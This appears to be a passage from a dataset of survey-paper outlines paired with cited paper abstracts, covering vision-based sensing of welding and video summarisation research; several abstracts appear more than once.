simply and elegantly using the surface gradient, unfortunately cannot deal with constraints imposed by occluding boundaries. These constraints are crucial if ambiguities in the solution of the shape-from-shading problem are to be avoided. Differrent schemes result if one uses different parameters to describe surface orientation. We derive two new schemes, using unit surface normals, that facilitate the incorporation of the occluding boundary information. These schemes, while more complex, have several advantages over previous ones. --- paper_title: Technique for simultaneous real-time measurements of weld pool surface geometry and arc force paper_content: This paper describes a new technique for simultaneous real-time measurement of weld pool surface geometry and arc force. The weld pool surface profile is measured using real-time radiography by vertical x-ray transmission through the weld. The information is received at a rate of 30 frames per second in the form of two-dimensional images which are digitized and processed in real time by computer. The surface topography is determined from the images using the experimentally found relation between image brightness and material thickness with an accuracy of 0.2 mm (0.008 in.) --- paper_title: A study of arc force, pool depression and weld penetration during gas tungsten arc welding paper_content: Weld pool depression, arc force, weld penetration, and their interrelations have been studied as a function of welding current. Pool depression and welding arc force have been measured simultaneously using a recently developed technique. The authors found quadratic dependence of arc force on current, confirming similar findings in previous studies. Pool depression is essentially zero below a threshold level of current (200 A in this experiment) and then increases quadratically with current. A perfectly linear relation between arc force and pool depression was found in the current range from 200 to 350 A, with pool depression onset at about 0.35 g force (0.34 [center dot] 10[sup [minus]2]N). The total surface tension and gravitational forces were calculated, from the measured surface topography, and found to be about five times that required to balance the arc force at 300 A. Thus electromagnetic and hydrodynamic forces must be taken into account to explain the measured levels of pool depression. The relation between weld penetration and pool depression for different welding currents has been established. Three distinct regimes of weld penetration on weld current were found. ---
Title: Vision-based Sensing of the Welding Process: A Survey Section 1: Introduction Description 1: Introduce the importance and applications of vision-based sensors, particularly in the welding process. Section 2: Optical sensors Description 2: Discuss the use of optical sensors to study oscillations and spectral analysis of the weld pool, including detailed techniques and setups. Section 3: 2D analysis of the weld pool Description 3: Present various techniques for real-time observation and measurement of the 2D shape of the weld pool, including laser strobe systems, edge detection, and co-axial viewing methods. Section 4: 3D analysis of the weld pool Description 4: Explore methods for measuring the 3D shape of the weld pool surface, including structured light, stereovision methods, and slope field computations. Section 5: Conclusion Description 5: Summarize the survey, highlighting the effectiveness, limitations, and application contexts of different vision-based sensing techniques.
Video summarisation: A conceptual framework and survey of the state of the art
10
--- paper_title: An innovative algorithm for key frame extraction in video summarization paper_content: Video summarization, aimed at reducing the amount of data that must be examined in order to retrieve the information desired from information in a video, is an essential task in video analysis and indexing applications. We propose an innovative approach for the selection of representative (key) frames of a video sequence for video summarization. By analyzing the differences between two consecutive frames of a video sequence, the algorithm determines the complexity of the sequence in terms of changes in the visual content expressed by different frame descriptors. The algorithm, which escapes the complexity of existing methods based, for example, on clustering or optimization strategies, dynamically and rapidly selects a variable number of key frames within each sequence. The key frames are extracted by detecting curvature points within the curve of the cumulative frame differences. Another advantage is that it can extract the key frames on the fly: curvature points can be determined while computing the frame differences and the key frames can be extracted as soon as a second high curvature point has been detected. We compare the performance of this algorithm with that of other key frame extraction algorithms based on different approaches. The summaries obtained have been objectively evaluated by three quality measures: the Fidelity measure, the Shot Reconstruction Degree measure and the Compression Ratio measure. --- paper_title: Content-based multimedia information retrieval: State of the art and challenges paper_content: Extending beyond the boundaries of science, art, and culture, content-based multimedia information retrieval provides new paradigms and methods for searching through the myriad variety of media all over the world. This survey reviews 100p recent articles on content-based multimedia information retrieval and discusses their role in current research directions which include browsing and search paradigms, user studies, affective computing, learning, semantic queries, new features and media types, high performance indexing, and evaluation techniques. Based on the current state of the art, we discuss the major challenges for the future. --- paper_title: Exploring video content structure for hierarchical summarization paper_content: In this paper, we propose a hierarchical video summarization strategy that explores video content structure to provide the users with a scalable, multilevel video summary. First, video-shot- segmentation and keyframe-extraction algorithms are applied to parse video sequences into physical shots and discrete keyframes. Next, an affinity (self-correlation) matrix is constructed to merge visually similar shots into clusters (supergroups). Since video shots with high similarities do not necessarily imply that they belong to the same story unit, temporal information is adopted by merging temporally adjacent shots (within a specified distance) from the supergroup into each video group. A video-scene-detection algorithm is thus proposed to merge temporally or spatially correlated video groups into scenario units. This is followed by a scene-clustering algorithm that eliminates visual redundancy among the units. A hierarchical video content structure with increasing granularity is constructed from the clustered scenes, video scenes, and video groups to keyframes. Finally, we introduce a hierarchical video summarization scheme by executing various approaches at different levels of the video content hierarchy to statically or dynamically construct the video summary. Extensive experiments based on real-world videos have been performed to validate the effectiveness of the proposed approach. --- paper_title: Video caption detection and extraction using temporal information paper_content: Video caption detection and extraction is an important step for information retrieval in video databases. In this paper, we extract text information in video by fully utilizing the temporal information contained in the video. First we create a binary abstract sequence from a video segment. By analyzing the statistical pixel changes in the sequence, we can effectively locate the (dis)appealing frames of captions. Finally we extract the captions to create a summary of the video segment. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Context and memory in multimedia content analysis paper_content: With the advent of broadband networking, video will be available online as well as through traditional distribution channels. The merging of entertainment and information media makes video content classification and retrieval a necessary tool. To provide fast retrieval, content management systems must discern between categories of video. Automatic multimedia analysis techniques for deriving high-level descriptions and annotations have experienced a tremendous surge in interest. Academia and industry have also been challenged to develop realistic applications-from home media library organizers and multimedia lecture archives to broadcast TV content navigators and video-on-demand-in pursuit of the killer application. Current content classification technologies have undoubtedly emerged from traditional image processing and computer vision, audio analysis and processing, and information retrieval. Although terminology varies, the algorithms generally fall into three categories: tangible detectors, high-level abstractors, and latent or intangible descriptors. This paper presents the reflections of the work done by the author and the work ahead. --- paper_title: Video summarization: methods and landscape paper_content: The ability to summarize and abstract information will be an essential part of intelligent behavior in consumer devices. Various summarization methods have been the topic of intensive research in the content-based video analysis community. Summarization in traditional information retrieval is a well understood problem. While there has been a lot of research in the multimedia community there is no agreed upon terminology and classification of the problems in this domain. Although the problem has been researched from different aspects there is usually no distinction between the various dimensions of summarization. The goal of the paper is to provide the basic definitions of widely used terms such as skimming, summarization, and highlighting. The different levels of summarization: local, global, and meta-level are made explicit. We distinguish among the dimensions of task, content, and method and provide an extensive classification model for the same. We map the existing summary extraction approaches in the literature into this model and we classify the aspects of proposed systems in the literature. In addition, we outline the evaluation methods and provide a brief survey. Finally we propose future research directions based on the white spots that we identified by analysis of existing systems in the literature. --- paper_title: Doing Qualitative Research paper_content: PART ONE: INTRODUCTION How to Use This Book What You Can (and Can't) Do with Qualitative Research Introduction Why Do Students Use Qualitative Methods? Are Qualitative Methods Always the Best? Should You Use Qualitative Methods? Concluding Remarks The Research Experience I Introduction Moira's Research Diary Sally's Research Diary Simon's Research Diary Concluding Remarks The Research Experience II Introduction Interviews Ethnographies Texts Audio Data Visual Data Multiple Methods Concluding Remarks What Counts as 'Originality'? Introduction Originality Being a 'Professional' Independent Critical Thought Concluding Remarks PART TWO: STARTING OUT Selecting a Topic Introduction Workable Research Questions Simplistic Inductivism The 'Kitchen Sink' Gambit The Grand Theorist Strategies for Simplistic Inductivists Strategies for 'Kitchen Sinkers' Strategies for Grand Theorists Strategies for All Researchers Concluding Remarks Using Theories Introduction How Theoretical Models Shape Research The Different Languages of Qualitative Research Theories, Models and Hypotheses Examples Concluding Remarks Choosing a Methodology Introduction Qualitative or Quantitative? Your Research Strategy Choosing a Methodology: A Case Study Naturally Occurring Data? Multiple Methods? Concluding Remarks Selecting a Case Introduction What Is a Case Study? Generalizing from Cases Types of Case Studies Combining Qualitative Research with Quantitative Measures of Populations Purposive Sampling Theoretical Sampling Generalizability Is Present in a Single Case Concluding Remarks Ethical Research Introduction The Standards of Ethical Research Why Ethics Matter for Your Research Ethical Guidelines in Practice Complex Ethical Issues Research Governance Conclusion: Managing Ethical Demands Writing a Research Proposal Introduction Aim for Crystal Clarity Plan before You Write Be Persuasive Be Practical Make Broader Links Concluding Remarks PART THREE: COLLECTING AND ANALYZING YOUR DATA Collecting Your Data Collecting Interview Data Collecting Ethnographic Data Concluding Remarks Developing Data Analysis Introduction Kick-Starting Data Analysis A Case Study Interviews Fieldnotes Transcripts Visual Data Concluding Remarks Using Computers to Analyze Qualitative Data - Clive Seale Introduction What CAQDAS Software Can Do For You Advantages of CAQDAS Limitations and Disadvantages Theory Building With CAQDAS Keyword Analysis Concluding Remarks Quality in Qualitative Research Introduction Validity Reliability Concluding Remarks Evaluating Qualitative Research Introduction Two Guides For Evaluating Research Four Quality Criteria Applying Quality Criteria Four Quality Issues Revisited Concluding Remarks PART FOUR: WRITING UP The First Few Pages Introduction The Title The Abstract The List of Contents The Introduction Concluding Remarks The Literature Review Chapter Recording Your Reading Writing Your Literature Review Practical Questions Principles Do You Need A Literature Review Chapter? Concluding Remarks The Methodology Chapter Introduction What Should The Methodology Chapter Contain? A Natural History Chapter? Concluding Remarks Writing Your Data Chapters Introduction The Macrostructure The Microstructure Tightening Up Concluding Remarks Your Final Chapter Introduction The Final Chapter as Mutual Stimulation What Exactly Should Your Final Chapter Contain? Confessions And Trumpets Theorizing As Thinking Through Data Writing For Audiences Why Your Final Chapter Can Be Fun Concluding Remarks PART FIVE: GETTING SUPPORT Making Good Use of Your Supervisor Introduction Supervision Horror Stories Student And Supervisor Expectations The Early Stages The Later Stages Standards Of Good Practice Concluding Remarks Getting Feedback Introduction Writing Speaking The Art Of Presenting Research Feedback From The People You Study Concluding Remarks PART SIX: REVIEW Effective Qualitative Research Introduction Keep It Simple Take Advantage Of Using Qualitative Data Avoid Drowning In Data Avoid Journalism Concluding Remarks PART SEVEN: THE AFTERMATH Surviving an Oral Examination Introduction Viva Horror Stories Preparing For Your Oral Doing The Oral Outcomes Revising Your Thesis After The Oral A Case Study Concluding Remarks Getting Published Introduction The Backstage Politics Of Publishing Strategic Choices What Journals Are Looking For Reviewers' Comments How To Write A Short Journal Article Concluding Remarks Audiences Introduction The Policy-Making Audience The Practitioner Audience The Lay Audience Concluding Remarks Finding a Job Introduction Learning About Vacancies Getting On A Shortlist The Job Interview Concluding Remarks --- paper_title: Qualitative Data Analysis: A User Friendly Guide for Social Scientists paper_content: From the Publisher: ::: Qualitative Data Analysis shows that learning how to analyse qualitative data by computer can be fun. Written in a stimulating style, with examples drawn mainly from every day life and contemporary humour, it should appeal to a wide audience. --- paper_title: Context and memory in multimedia content analysis paper_content: With the advent of broadband networking, video will be available online as well as through traditional distribution channels. The merging of entertainment and information media makes video content classification and retrieval a necessary tool. To provide fast retrieval, content management systems must discern between categories of video. Automatic multimedia analysis techniques for deriving high-level descriptions and annotations have experienced a tremendous surge in interest. Academia and industry have also been challenged to develop realistic applications-from home media library organizers and multimedia lecture archives to broadcast TV content navigators and video-on-demand-in pursuit of the killer application. Current content classification technologies have undoubtedly emerged from traditional image processing and computer vision, audio analysis and processing, and information retrieval. Although terminology varies, the algorithms generally fall into three categories: tangible detectors, high-level abstractors, and latent or intangible descriptors. This paper presents the reflections of the work done by the author and the work ahead. --- paper_title: Video summarization: methods and landscape paper_content: The ability to summarize and abstract information will be an essential part of intelligent behavior in consumer devices. Various summarization methods have been the topic of intensive research in the content-based video analysis community. Summarization in traditional information retrieval is a well understood problem. While there has been a lot of research in the multimedia community there is no agreed upon terminology and classification of the problems in this domain. Although the problem has been researched from different aspects there is usually no distinction between the various dimensions of summarization. The goal of the paper is to provide the basic definitions of widely used terms such as skimming, summarization, and highlighting. The different levels of summarization: local, global, and meta-level are made explicit. We distinguish among the dimensions of task, content, and method and provide an extensive classification model for the same. We map the existing summary extraction approaches in the literature into this model and we classify the aspects of proposed systems in the literature. In addition, we outline the evaluation methods and provide a brief survey. Finally we propose future research directions based on the white spots that we identified by analysis of existing systems in the literature. --- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts in faster than realtime. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. The prototype experiments have shown the effectiveness and stabilities of the system. --- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing. Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: Tennis video abstraction from audio and visual cues paper_content: We propose a context-based model of video abstraction exploiting both audio and video features and applied to tennis TV programs. We can automatically produce different types of summary of a given video depending on the users' constraints or preferences. We have first designed an efficient and accurate temporal segmentation of the video into segments homogeneous w.r.t the camera motion. We introduce original visual descriptors related to the dominant and residual image motions. The different summary types are obtained by specifying adapted classification criteria which involve audio features to select the relevant segments to be included in the video abstract. The proposed scheme has been validated on 22 hours of tennis videos. --- paper_title: From context to content: leveraging context to infer media metadata paper_content: The recent popularity of mobile camera phones allows for new opportunities to gather important metadata at the point of capture. This paper describes a method for generating metadata for photos using spatial, temporal, and social context. We describe a system we implemented for inferring location information for pictures taken with camera phones and its performance evaluation. We propose that leveraging contextual metadata at the point of capture can address the problems of the semantic and sensory gaps. In particular, combining and sharing spatial, temporal, and social contextual metadata from a given user and across users allows us to make inferences about media content. --- paper_title: Automatic Soccer Video Analysis and Summarization paper_content: We propose a fully automatic and computationally efficient framework for analysis and summarization of soccer videos using cinematic and object-based features. The proposed framework includes some novel low-level processing algorithms, such as dominant color region detection, robust shot boundary detection, and shot classification, as well as some higher-level algorithms for goal detection, referee detection, and penalty-box detection. The system can output three types of summaries: i) all slow-motion segments in a game; ii) all goals in a game; iii) slow-motion segments classified according to object-based features. The first two types of summaries are based on cinematic features only for speedy processing, while the summaries of the last type contain higher-level semantics. The proposed framework is efficient, effective, and robust. It is efficient in the sense that there is no need to compute object-based features when cinematic features are sufficient for the detection of certain events, e.g., goals in soccer. It is effective in the sense that the framework can also employ object-based features when needed to increase accuracy (at the expense of more computation). The efficiency, effectiveness, and robustness of the proposed framework are demonstrated over a large data set, consisting of more than 13 hours of soccer video, captured in different countries and under different conditions. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Design and evaluation of a music video summarization system paper_content: We present a system that summarizes the textual, audio, and video information of music videos in a format tuned to the preferences of a focus group of 20 users. First, we analyzed user-needs for the content and the layout of the music summaries. Then, we designed algorithms that segment individual song videos from full music video programs by noting changes in color palette, transcript, and audio classification. We summarize each song with automatically selected high level information such as title, artist, duration, title frame, and text as well as audio and visual segments of the chorus. Our system automatically determines with high recall and precision chorus locations, from the placement of repeated words and phrases in the text of the song's lyrics. Our Bayesian belief network then selects other significant video and audio content from the multiple media. Overall, we are able to compress content by a factor of 10. Our second user study has identified the principal variations between users in their choices of content desired in the summary, and in their choices of the platforms that should support their viewing. --- paper_title: Summarizing wearable video paper_content: "We want to record our entire life by video" is the motivation of this research. Developing wearable devices and huge storage devices will make it possible to keep entire life by video. We could capture 70 years of our life, however, the problem is how to handle such a huge amount of data. Automatic summarization based on personal interest should be required. In this paper we propose an approach to the automatic structuring and summarization of wearable video. (Wearable video is our abbreviation of "video captured by a wearable camera".) In our approach, we make use of a wearable camera and a sensor of brain waves. The video is firstly structured by objective features of video, and the shots are rated by subjective measures based on brain waves. The approach is very successful for real world experiments and it automatically extracted all the events that the subjects reported they had felt interesting. --- paper_title: Creating audio keywords for event detection in soccer video paper_content: This paper presents a novel framework called audio keywords to assist event detection in soccer video. Audio keyword is a middle-level representation that can bridge the gap between low-level features and high-level semantics. Audio keywords are created from low-level audio features by using support vector machine learning. The created audio keywords can be used to detect semantic events in soccer video by applying a heuristic mapping. Experiments of audio keywords creation and event detection based on audio keywords have illustrated promising results. According to the experimental results, we believe that audio keyword is an effective representation that is able to achieve more intuitionistic result for event detection in sports video compared with the method of event detection directly based on low-level features. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: Event detection in baseball video using superimposed caption recognition paper_content: We have developed a novel system for baseball video event detection and summarization using superimposed caption text detection and recognition. The system detects different types of semantic level events in baseball video including scoring and last pitch of each batter. The system has two components: event detection and event boundary detection. Event detection is realized by change detection and recognition of game stat texts (such as text information showing in score box). Event boundary detection is achieved using our previously developed algorithm, which detects the pitch view as the event beginning and nonactive view as potential endings of the event. One unique contribution of the system is its capability to accurately detect the semantic level events by combining video text recognition with camera view recognition. Another unique feature is the real-time processing speed by taking advantage of compressed-domain approaches in part of the algorithms such as caption detection. To the best of our knowledge, this is the first system achieving accurate detection of multiple types of high-level semantic events in baseball videos. --- paper_title: The priority curve algorithm for video summarization paper_content: In this paper, we introduce the concept of a priority curve associated with a video. We then provide an algorithm that can use the priority curve to create a summary (of a desired length) of any video. The summary thus created exhibits nice continuity properties and also avoids repetition. We have implemented the priority curve algorithm (PCA) and compared it with other summarization algorithms in the literature. We show that PCA is faster than existing algorithms and also produces better quality summaries. The quality of summaries was evaluated by a group of 200 students in Naples, Italy, who watched soccer videos. We also briefly describe a soccer video summarization system we have built on using the PCA architecture and various (classical) image processing algorithms. --- paper_title: Multimedia content analysis-using both audio and visual clues paper_content: Multimedia content analysis refers to the computerized understanding of the semantic meanings of a multimedia document, such as a video sequence with an accompanying audio track. With a multimedia document, its semantics are embedded in multiple forms that are usually complimentary of each other, Therefore, it is necessary to analyze all types of data: image frames, sound tracks, texts that can be extracted from image frames, and spoken words that can be deciphered from the audio track. This usually involves segmenting the document into semantically meaningful units, classifying each unit into a predefined scene type, and indexing and summarizing the document for efficient retrieval and browsing. We review advances in using audio and visual information jointly for accomplishing the above tasks. We describe audio and visual features that can effectively characterize scene content, present selected algorithms for segmentation and classification, and review some testbed systems for video archiving and retrieval. We also describe audio and visual descriptors and description schemes that are being considered by the MPEG-7 standard for multimedia content description. --- paper_title: Generation of personalized abstract of sports video paper_content: Video abstraction is defined as creating a shorter video clip from an original video stream. In this paper, we propose a method of generating a personalized abstract of broadcasted sports video. We first detect significant events from the video stream by matching with gamestats in which highlights of the game are described. Textual information in an overlay appearing on an image frame is recognized for this matching. Then, we select highlight shots from these detected events, reflecting on personal preferences. Finally, we connect each shot augmented with related audio and text in temporal order. From experimental results, we verified that an hourlength video can be compressed into a minute-length personalized abstract. --- paper_title: MSN: statistical understanding of broadcasted baseball video using multi-level semantic network paper_content: The information processing of sports video yields valuable semantics for content delivery over narrowband networks. Traditional image/video processing is formulated in terms of low-level features describing image/video structure and intensity, while the high-level knowledge such as common sense and human perceptual knowledge are encoded in abstract and nongeometric representations. The management of semantic information in video becomes more and more difficult because of the large difference in representations, levels of knowledge, and abstract episodes. This paper proposes a semantic highlight detection scheme using a Multi-level Semantic Network (MSN) for baseball video interpretation. The probabilistic structure can be applied for highlight detection and shot classification. Satisfactory results will be shown to illustrate better performance compared with the traditional ones. --- paper_title: Highlights for more complete sports video summarization paper_content: Summarization is an essential requirement for achieving a more compact and interesting representation of sports video contents. We propose a framework that integrates highlights into play segments and reveal why we should still retain breaks. Experimental results show that fast detections of whistle sounds, crowd excitement, and text boxes can complement existing techniques for play-breaks and highlights localization. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news. --- paper_title: Content-based multimedia information retrieval: State of the art and challenges paper_content: Extending beyond the boundaries of science, art, and culture, content-based multimedia information retrieval provides new paradigms and methods for searching through the myriad variety of media all over the world. This survey reviews 100p recent articles on content-based multimedia information retrieval and discusses their role in current research directions which include browsing and search paradigms, user studies, affective computing, learning, semantic queries, new features and media types, high performance indexing, and evaluation techniques. Based on the current state of the art, we discuss the major challenges for the future. --- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing. Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: Two-Stage Hierarchical Video Summary Extraction to Match Low-Level User Browsing Preferences paper_content: A compact summary of video that conveys visual content at various levels of detail enhances user interaction significantly. In this paper, we propose a two-stage framework to generate MPEG-7-compliant hierarchical key frame summaries of video sequences. At the first stage, which is carried out off-line at the time of content production, fuzzy clustering and data pruning methods are applied to given video segments to obtain a nonredundant set of key frames that comprise the finest level of the hierarchical summary. The number of key frames allocated to each shot or segment is determined dynamically and without user supervision through the use of cluster validation techniques. A coarser summary is generated on-demand in the second stage by reducing the number of key frames to match the low-level browsing preferences of a user. The proposed method has been validated by experimental results on a collection of video programs. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: Automatic generation of video summaries for historical films paper_content: A video summary is a sequence of video clips extracted from a longer video. Much shorter than the original, the summary preserves its essential messages. In the ECHO (European Chronicles On-line) project, a system was developed to store and manage large collections of historical films for the preservation of cultural heritage. At the University of Mannheim, we have developed the video summarization component of the ECHO system. We discuss the particular challenges the historical film material poses, and how we have designed new video processing algorithms and modified existing ones to cope with noisy black-and-white films. --- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts in faster than realtime. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. The prototype experiments have shown the effectiveness and stabilities of the system. --- paper_title: A highlight scene detection and video summarization system using audio feature for a personal video recorder paper_content: The personal video recorder such as recordable-DVD recorder, Blu-ray disc recorder and/or hard disc recorder has become popular for a large volume storage device for video/audio content data and a browsing function that would quickly provide a desired scene to the user is required as an essential part of such a large capacity recording/playback system. We propose a highlight scene detection function by using only 'audio' features and realize a browsing function for the recorder that enables completely automatic detection of sports highlights. We detect sports highlights by identifying portions with "commentator's excited speech" using Gaussian mixture models (GMM's) trained using the MDL criterion. Our computation is carried out directly on the MDCT coefficients from the AC-3 coefficients thus giving us a tremendous speed advantage. Our accuracy of detection of sports highlights is high across a variety of sports. --- paper_title: An empirical investigation into user navigation of digital video using the VCR-like control set paper_content: There has been an almost explosive growth in digital video in recent years. The convention for enabling users to navigate digital video is the Video Cassette Recorder-like (VCR-like) control set, which is dictated by the proliferation of media players that embody it, including Windows Media Player and QuickTime. However, there is a dearth of research seeking to understand how users relate to this control set and how useful it actually is in practice. This paper details our empirical investigation of the issue. A digital video navigation system with a VCR-like control set was developed and subsequently used by a large sample of users (n=200), who were required to complete a number of goal-directed navigational tasks. Each user's navigational activity was tracked and recorded automatically by the system. Analysis of the navigational data revealed a range of results concerning how the VCR-like control set both enhanced and limited the user's ability to locate sequences of interest, including a number of searching and browsing strategies that were exploited by the users. --- paper_title: Video Adaptation: Concepts, Technologies, and Open Issues paper_content: Video adaptation is an emerging field that offers a rich body of techniques for answering challenging questions in pervasive media applications. It transforms the input video(s) to an output in video or augmented multimedia form by utilizing manipulations at multiple levels (signal, structural, or semantic) in order to meet diverse resource constraints and user preferences while optimizing the overall utility of the video. There has been a vast amount of activity in research and standard development in this area. This paper first presents a general framework that defines the fundamental entities, important concepts (i.e., adaptation, resource, and utility), and formulation of video adaptation as constrained optimization problems. A taxonomy is used to classify different types of adaptation techniques. The state of the art in several active research areas is reviewed with open challenging issues identified. Finally, support of video adaptation from related international standards is discussed. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news. --- paper_title: Video skimming and characterization through the combination of image and language understanding paper_content: Digital video is rapidly becoming important for education, entertainment and a host of multimedia applications. With the size of the video collections growing to thousands of hours, technology is needed to effectively browse segments in a short time without losing the content of the video. We propose a method to extract the significant audio and video information and create a skim video which represents a very short synopsis of the original. The goal of this work is to show the utility of integrating language and image understanding techniques for video skimming by extraction of significant information, such as specific objects, audio keywords and relevant video structure. The resulting skim video is much shorter; where compaction is as high as 20:1, and yet retains the essential content of the original segment. We have conducted a user-study to test the content summarization and effectiveness of the skim as a browsing tool. --- paper_title: An innovative algorithm for key frame extraction in video summarization paper_content: Video summarization, aimed at reducing the amount of data that must be examined in order to retrieve the information desired from information in a video, is an essential task in video analysis and indexing applications. We propose an innovative approach for the selection of representative (key) frames of a video sequence for video summarization. By analyzing the differences between two consecutive frames of a video sequence, the algorithm determines the complexity of the sequence in terms of changes in the visual content expressed by different frame descriptors. The algorithm, which escapes the complexity of 